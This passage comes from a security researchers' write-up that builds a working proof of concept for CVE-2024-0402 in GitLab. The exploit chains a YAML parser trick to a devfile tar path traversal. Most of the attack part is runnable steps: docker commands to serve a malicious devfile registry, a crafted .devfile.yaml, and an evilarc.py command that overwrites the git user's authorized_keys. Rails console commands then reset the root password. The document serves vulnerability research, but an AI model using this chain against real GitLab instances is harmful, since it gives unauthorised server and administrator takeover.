- filepath.Clean is known for not preventing path traversals on relative paths (../ is not removed)
The resulting execution will be something like:
fmt.Println(filepath.Clean("/../../../../../../../tmp/test")) // absolute path
fmt.Println(filepath.Clean("../../../../../../../tmp/test")) // relative path
//prints
/tmp/test
../../../../../../../tmp/test
There are plenty of scripts to create a valid PoC for an evil archive exploiting such a directory-traversal pattern (e.g., evilarc.py).
The requirements to exploit this vuln are:
- the devfile lib fetching files from a remote registry, which allowed a devfile registry containing a malicious .tar archive to write arbitrary files within the devfile client system
- a devfile.yaml definition including the parent option that forces the GitLab server to use the malicious registry, hence triggering the arbitrary file write on the server itself
To ensure you have the full picture, I must tell you what it's like to configure Workspaces in GitLab with slow internet while on a cruise 🌊 - an absolute nightmare!
Of course, there are docs on how to do so, but today you will be blessed with some extra finds:
- The web-ide-injector container image is referenced in editor_component_injector.rb:
ubuntu@gitlabServer16.8:~$ find / -name "editor_component_injector.rb" 2>/dev/null
/opt/gitlab/embedded/service/gitlab-rails/ee/lib/remote_development/workspaces/create/editor_component_injector.rb
Replace the value at line 129 (the web-ide-injector image) with:
registry.gitlab.com/gitlab-org/gitlab-web-ide-vscode-fork/gitlab-vscode-build:latest
- Enable the remote_development option to allow Workspaces. Here is a config.yaml file for it:
remote_development:
enabled: true
dns_zone: "workspaces.gitlab.yourdomain.com"
observability:
logging:
level: debug
grpc_level: warn
May the force be with you while configuring it.
As previously stated, this bug chain is layered like an onion. Here is a classic 2025 AI-generated image sketching it for us:
The publicly available information left us with the following tasks if we wanted to exploit it:
- build a malicious devfile registry serving an evil archive.tar
- craft a .devfile.yaml pointing to it in a target GitLab repository
In order to find out where the malicious .tar belonged, we had to take a step back and read some more code. In particular, we had to understand the context in which the vulnerable decompress function was being called.
We ended up reading PullStackByMediaTypesFromRegistry, a function used to pull a specified stack with allowed media types from a given registry URL to a destination directory. See library.go:293:
func PullStackByMediaTypesFromRegistry(registry string, stack string, allowedMediaTypes []string, destDir string, options RegistryOptions) error {
//...
//Logic to Pull a stack from registry and save it to disk
//...
// Decompress archive.tar
archivePath := filepath.Join(destDir, "archive.tar")
if _, err := os.Stat(archivePath); err == nil {
err := decompress(destDir, archivePath, ExcludedFiles)
if err != nil {
return err
}
err = os.RemoveAll(archivePath)
if err != nil {
return err
}
}
return nil
}
The code pattern highlighted that devfile registry stacks were involved and that they included some archive.tar file in their structure.
Why should a devfile stack contain a tar?
An archive.tar file may be included in the package to distribute starter projects or pre-configured application templates. It helps developers quickly set up their workspace with example code, configurations, and dependencies.
A few quick GitHub searches in the devfile registry building process revealed that our target .tar file should be placed within the registry project under stacks/<STACK_NAME>/<STACK_VERSION>/archive.tar, in the same directory containing the devfile.yaml for the specific version being deployed.
As a result, the destination for the path-traversal tar in our custom registry is:
malicious-registry/stacks/nodejs/2.2.1/archive.tar
It required some extra work to build our custom registry (we couldn't make the building scripts work and had to edit them), but we eventually managed to place our archive.tar (e.g., created using evilarc.py) in the right spot and craft a proper index.json to serve it. The final reusable structure can be found in our PoC repository, so you can save yourself the time of building the devfile registry image.
Commands to run the malicious registry:
- docker run -d -p 5000:5000 --name local-registrypoc registry:2 to serve a local container registry that will be used by the devfile registry to store the actual stack (see yellow highlight)
- docker run --network host devfile-index to run the malicious devfile registry built with the official repository. Find it in our PoC repository.
Once you have a running registry reachable by the target GitLab instance, you just have to authenticate in GitLab as a developer and edit the .devfile.yaml of a repository to point to it, exploiting the YAML parser differential shown before.
Here is an example you can use:
schemaVersion: 2.2.0
!binary parent:
id: nodejs
registryUrl: http://<YOUR_MALICIOUS_REGISTRY>:<PORT>
components:
- name: development-environment
attributes:
gl/inject-editor: true
container:
image: "registry.gitlab.com/gitlab-org/gitlab-build-images/workspaces/ubuntu-24.04:20250109224147-golang-1.23@sha256:c3d5527641bc0c6f4fbbea4bb36fe225b8e9f1df69f682c927941327312bc676"
To trigger the file-write, just start a new Workspace in the edited repo and wait.
Nice! We have successfully written Hello CVE-2024-0402! into /tmp/plsWorkItsPartyTime.txt.
We got the write, but we couldn’t stop there, so we investigated some reliable ways to escalate it.
First things first, we checked the system user performing the file write using a session on the GitLab server.
/tmp$ ls -lah /tmp/plsWorkItsPartyTime.txt
-rw-rw-r-- 1 git git 21 Mar 10 15:13 /tmp/plsWorkItsPartyTime.txt
Apparently, our go-to user is git, a pretty important user in the GitLab internals.
After inspecting writable files for a quick win, we found the system seemed hardened, without tons of editable config files, as expected.
...
/var/opt/gitlab/gitlab-exporter/gitlab-exporter.yml
/var/opt/gitlab/.gitconfig
/var/opt/gitlab/.ssh/authorized_keys
/opt/gitlab/embedded/service/gitlab-rails/db/main_clusterwide.sql
/opt/gitlab/embedded/service/gitlab-rails/db/ci_structure.sql
/var/opt/gitlab/git-data/repositories/.gitaly-metadata
...
Some interesting files were waiting to be overwritten, but you may have noticed the quickest, yet not honorable, entry: /var/opt/gitlab/.ssh/authorized_keys.
Notably, you can add an SSH key to your GitLab account and then use it to SSH in as git to perform code-related operations. The authorized_keys file is managed by GitLab Shell, which adds the SSH keys from user profiles and forces them into a restricted shell to further manage/restrict the user's access level.
Here is an example line added to the authorized keys when you add your profile SSH key in GitLab:
command="/opt/gitlab/embedded/service/gitlab-shell/bin/gitlab-shell key-1",no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty ssh-ed25519 AAAAC3...[REDACTED]
Since we got an arbitrary file write, we can just substitute the authorized_keys file with one containing a non-restricted key we control. Back to our exploit prepping, create a new ad-hoc .tar for it:
## write a valid entry in a local authorized_keys for one of your keys
➜ python3 evilarc.py authorized_keys -f archive.tar.gz -p var/opt/gitlab/.ssh/ -o unix
At this point, substitute the archive.tar in your malicious devfile registry, rebuild its image and run it. When ready, trigger the exploit again by creating a new Workspace in the GitLab Web UI.
After a few seconds, you should be able to SSH in as an unrestricted git user.
Below we also show how to change the password of the GitLab Web root user:
➜ ssh -i ~/.ssh/gitlab2 git@gitinstance.local
➜ git@gitinstance.local:~$ gitlab-rails console --environment production
--------------------------------------------------------------------------------
Ruby: ruby 3.1.4p223 (2023-03-30 revision 957bb7cb81) [x86_64-linux]
GitLab: 16.8.0-ee (1e912d57d5a) EE
GitLab Shell: 14.32.0
PostgreSQL: 14.9
------------------------------------------------------------[ booted in 39.28s ]
Loading production environment (Rails 7.0.8)
irb(main):002:0> user = User.find_by_username 'root'
=> #<User id:1 @root>
irb(main):003:0> new_password = 'ItIsPartyTime!'
=> "ItIsPartyTime!"
irb(main):004:0> user.password = new_password
=> "ItIsPartyTime!"
irb(main):005:0> user.password_confirmation = new_password
=> "ItIsPartyTime!"
irb(main):006:0> user.password_automatically_set = false
irb(main):007:0> user.save!
=> true
Finally, you are ready to authenticate as the root user in the target web instance.
Our goal was to build a PoC for CVE-2024-0402, and we were able to do it despite the restricted time and connectivity. Still, there were tons of configuration errors while preparing the GitLab Workspaces environment; we almost surrendered because the feature itself was just not working after hours of setup. Once again, this demonstrates how very good bugs can be found in places few people venture into because of configuration time constraints.
Shout out to joernchen for the discovery of the chain. Not only was the bug great, but he also did amazing work describing the research path he followed in this article. We had fun exploiting it, and we hope people will save time with our public exploit!